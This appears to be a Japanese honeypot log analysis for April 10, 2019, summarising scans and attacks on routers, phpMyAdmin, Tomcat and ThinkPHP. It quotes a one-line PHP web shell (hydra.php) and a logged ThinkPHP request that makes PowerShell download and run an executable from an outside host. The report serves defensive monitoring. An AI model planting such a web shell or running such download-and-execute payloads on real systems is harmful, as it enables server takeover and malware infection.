BW-Potのログ分析 (2019/04/10)
本日の総アクセス件数は569件です。送信元IP数は75IPです。
・Cisco製ルータRV320、RV325の脆弱性(CVE-2019-1652,CVE-2019-1653)に
関する通信を観測しました。
・ThinkPHPに関連する通信を観測
GET hydra.phpという通信を検知しました。
以前にあった、ThinkPHPの脆弱性を用いて以下のような
hydra.phpが作成されておりました。
<?php $action = $_GET['xcmd'];system($action);?
・Tomato RAFに関する通信を観測。
GET /admin-scripts.aspという通信がありました。
ファイルパスからはTomato RAFかと思われますが、
脆弱性情報などは確認できませんでした。
| 件数 | 種別 | リクエスト |
| 370 | アクセス | GET / |
| 182 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 3 | アクセス | HEAD / |
| 3 | FreePBXに関する調査 | GET /admin/assets/js/views/login.js |
| 2 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | 不正中継の調査 | HEAD 112.124.42[.]80/ |
| 1 | 不明 | GET /acadmin.php |
| 1 | Tomato RAFに関する調査 | GET /admin-scripts.asp |
| 1 | Cisco製ルータの脆弱性(CVE-2019-1653)に関する攻撃 | GET /cgi-bin/config.exp |
| 1 | phpMyAdminに関する調査(ZmEuによるScan) | GET /phpMyAdmin/scripts/setup.php |
| 1 | ThinkPHPに関する攻撃 | GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/ovtdgclulcyoeik15987.exe');start%20C:/Windows/temp/ovtdgclulcyoeik15987.exe |
| 1 | クローリング | GET /robots.txt |
| 1 | サイトの構成調査 | GET /sitemap.xml |
| 1 | phpMyAdminに関する調査(ZmEuによるScan) | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
参考リンク
